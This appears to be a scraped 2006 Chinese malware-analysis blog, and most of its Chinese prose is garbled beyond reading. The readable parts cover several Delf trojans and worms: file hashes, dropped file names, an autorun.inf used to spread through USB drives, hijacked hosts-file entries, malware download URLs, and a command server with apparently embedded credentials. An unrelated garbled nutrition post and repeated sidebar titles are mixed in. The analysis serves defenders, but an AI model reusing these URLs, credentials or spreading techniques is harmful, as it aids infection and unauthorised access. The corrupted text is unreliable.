C:\WINDOWS\Debug\dcpromo.log

��˵��ƻ�ϵͳǽ��ٿ��˯�ˡ��

��Ȼ��أ�hxxp://media.pixpond.com/l9rd6g.jpg/FSG

Ȼ��ƻ�һЩϵͳ��

�ƹ�һ�¡��Ҹ��ʨ�ӡ��ġ��ѩרɱ��MiscKiller

kvirus.bokee.com — Sat,12 Aug 2006 08:48:13 CST

��רɱ��߿��ѩ��ľ��Trojan.PSW.Misc��һЩ��ֲ��

ֱ�ӵ��ɱ��ť��ɲ�ɱ��һЩɱ��ɱ��û�ж�ע��޸��ṩ��ע��޸��ܣ��ɽ�ע��޸��ϵͳĬ��״̬��

�緢�ֱ��޷��ɱ�ġ��ѩ��֣��뽫��ѹ��virusup@gmail.com��

��ص�ַ��http://www.cisrt.org/bbs/attachment.php?aid=42

http://hzqedison.mm9mm.com/virus/MiscKiller.exe

Worm.Win32.Delf.aj wincfgs.exe KB20060111.exe

kvirus.bokee.com — Sat,05 Aug 2006 12:29:08 CST

wincfgs.exe

UPX

CRC32:100A382A
MD5:07ADDDEF653A702B9A11EDBCEE07E82B

RECYCLER\RECYCLER\autorun.exe
RECYCLER\RECYCLER\desktop.ini
autorun.inf
USBSPY1.0
\wincfgs.exe

USBSpyRunMutex
\KB20060111.exe

[autorun]\r\nopen=.\\RECYCLER\\RECYCLER\\autorun.exe\r\n\r\nshell\\1=Open\r\nshell\\1\\Command=.\\RECYCLER\\RECYCLER\\autorun.exe\r\nshell\\2\\=Browser\r\nshell\\2\\Command=.\\RECYCLER\\RECYCLER\\autorun.exe\r\n\r\nshellexecute=.\\RECYCLER\\RECYCLER\\autorun.exe\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n

[.ShellClassInfo]\r\nCLSID={645FF040-5081-101B-9F08-00AA002F954E}\r\n

�ŵ�λ�ò��ƶ��豸Ҳ��Ź�

cq.exe cq1.exe cq2.exe

kvirus.bokee.com — Sat,05 Aug 2006 09:18:17 CST

cq.exe

upx

CRC32��E596ED81

MD5��C45AB835DE548C7B033AD3BD4FAD47AF

AVP��Trojan-Downloader.Win32.Delf.asv

http://bbs.52happy.net/job.php?action=download&pid=tpc&tid=201215&aid=111949

http://down.136136.net/down/host.txt

drivers\etc\hosts
61.129.75.124 mir.100888290cs.com
61.129.75.124 woool.100888290cs.com
61.129.75.124 www.mir5173.com
61.129.75.124 ert0003.e76.163ns.com
222.73.4.246 www.chenshijituan.com
59.36.96.132 qq.etsoft.com.cn
127.0.0.1 eb114.net
127.0.0.1 www.u7u.cn
61.129.75.124 www.wg581.com

http:/down.136136.net/down/
update
update\updatexd.exe
cq1.exe
update\updatexxd.exe
cq2.exe
update\updatexdxd.exe
cq3.exe
fuccvknet@1zxcvZC63.com

like.bug.exe

kvirus.bokee.com — Fri,04 Aug 2006 16:05:59 CST

bugserver.3322.org

user:jhjusr
password:jhJmY3C3Nc

C:\Tempbug.sys
like.bug.exe
vcltest3.dll
syslog.exe
~btempfile.exe
icobugtemp.ico

ѧ��ذ��ĸ��

kvirus.bokee.com — Sun,30 Jul 2006 12:00:24 CST

ʳ��Ϊ��Ҫ��ᳫʲô��Ʒ��

��

��ʳ��Դ

��Ϊά��ܵ��Ҫ΢��Ԫ��˶��о��ʼ��ֹ��ж��ԡ�ֱ��20��50��й��Ӫ��֤�ݲ��𽥻��˲��պ�ֲ��ڸΡ�Ƣ��С�

��ѪҺ��Ũ��Ϊ0��22΢�ˣ��ˡ��뵰��ʽ�ϲ��ѪҺ��͵��֯��ӷ��ͺ��ų��Ҫͨ��й��֯�Ĵ�л��̡��빹�ɹ��׸��Ĺ��ø��ɴ߻��ԭ�͵Ĺ��׸��ת��͵Ĺ��׸��ģ��ֹ��⼰��ϸ��𺦡��Ԥ��ɽ��

Ŀǰ��ĳЩ��Ⱥ��Ϻ�ʵ��ʵ��˵��п��ܡ��ʳ��е��ĺ��ܸ��Ӱ��ܴ��ˣ�ȱ��͸��ֲ�ﺬ��кܴ��죬ͨ��˽�ʳ��к��ʱӦע��ء�

��ķḻ��Դ��֥�顢��ࡢ��⡢Ģ��ס��ʱ��ˡ��빽��Ρ��㡢�Ȳˡ��ۡ��͡�ơ�ƽ�ĸ��С��ߺ��Ϻ��Դ�к�з��ɱ��㡢�ɻ��㡢��㡢��Ϻ��͡��͡��ࡢȫС��(��)��з��⡣һ��Դ��С��㡢��֡��ܲ��ȫ��ۡ�ơ�ơ��ס��֭��ȫ֬ţ�̡�΢��Դ��ס�С�ס��ҡ��͵��⡢�ͱ��ˮ��ǡ�

��

kvirus.bokee.com — Fri,28 Jul 2006 12:17:19 CST

�ٶȲ��Խ׶ε�©��

��ް�ȫ��ԡ��

��Ҫ��ȥ�ˡ��ȫ��ˮ��˭˵�ģ��

http://hi.baidu.com/

kvirus.bokee.com

wbem\winlogon.exe wbem\smss.exe aspwswind.dll��ʲô

qproecss.exe ineptpui.dll disckopy.exe avifli32.dl

�о�����˾�����̳����DL��

���ݴ�ѧ-ά����Ѷ-���ĿƼ��ڿ����ݿ�-����վV6.32

IE VML��ȫ����������MS06-055--KB925486

С��Ϸ-С������&��������

����Ц�������ĸ�Ц��һ�Ż���51haha.com and top008.com������

NetworkDNS.exe��CControl.exe��kavsvc.exe

���˰�ȫ�����Ľ���--��ֹ���ʶ�����������ҳ

hxxp://59.34.197.195/theopen.exe

���ж���ġ��й��ֲļ۸�����

v20060913�����ˣ�����������

tomsb��ŮͼƬ���Ķ���

����ʡ���¿�����Ϣ����ֲ��

����ǰ�ģ��ڷ����� ����������Դ��̳��

QQ�ϴ��Ĳ�����ܷܷ������

���ݷ�����Ϣ��������

Trojan-Dropper.Win32.Delf.zb Unit.exe

v20060903.rar������N�࣬�汾����Ҳ�ؿ죬��Ⱦ��Χ��ͦ��

��վ����wm.htm���ֵıȽ϶�

�²�������һ��ѧ����

[ת��]8088 �����ת

�Ӱ���ü��ͼ���Ķ���ű�

ĳʡ�㲥���Ӵ�ѧԶ�����ʽ�����̳���Ҷ�

XX������������վ���Ҳ���

����ɱ������2007 / ���Ǹ��˷���ǽ2007 - ��������

ֵ��ע������bot

SMSS.EXE OR LSASS.EXE OR WINLOGON�������޸�����

Free F-Secure Anti-Virus 2006 AND KAV 6.0

��桰ħ������SVCHOST.EXE����������

Mocbot�����ٴα�����SVCHOST.EXEӦ�ó���������

�ƹ�һ�¡��Ҹ���ʨ�ӡ��ġ���ѩרɱ��MiscKiller

Worm.Win32.Delf.aj wincfgs.exe KB20060111.exe

cq.exe cq1.exe cq2.exe

like.bug.exe

ѧ��ذ���ĸ����

���������

�о��˾��̳��DL��

��ݴ�ѧ-ά��Ѷ-��ĿƼ��ڿ��ݿ�-��վV6.32

IE VML��ȫ��MS06-055--KB925486

С��Ϸ-С��&��

��Ц��ĸ�Ц��һ�Ż��51haha.com and top008.com��

��˰�ȫ��Ľ��--��ֹ��ʶ��ҳ

��ж��ġ��й��ֲļ۸��

v20060913��ˣ��

tomsb��ŮͼƬ��Ķ��

��ʡ��¿��Ϣ��ֲ��

��ǰ�ģ��ڷ�� Դ��̳��

QQ�ϴ��Ĳ��ܷܷ��

��ݷ��Ϣ��

v20060903.rar��N�࣬�汾��Ҳ�ؿ죬��Ⱦ��Χ��ͦ��

��վ��wm.htm��ֵıȽ϶�

�²��һ��ѧ��

[ת��]8088 ��ת

�Ӱ��ü��ͼ��Ķ��ű�

ĳʡ�㲥��Ӵ�ѧԶ��ʽ��̳��Ҷ�

XX��վ��Ҳ��

��ɱ��2007 / ��Ǹ��˷��ǽ2007 - ��

ֵ��ע��bot

SMSS.EXE OR LSASS.EXE OR WINLOGON��޸��

��桰ħ��SVCHOST.EXE��

Mocbot��ٴα��SVCHOST.EXEӦ�ó��

�ƹ�һ�¡��Ҹ��ʨ�ӡ��ġ��ѩרɱ��MiscKiller

ѧ��ذ��ĸ��

��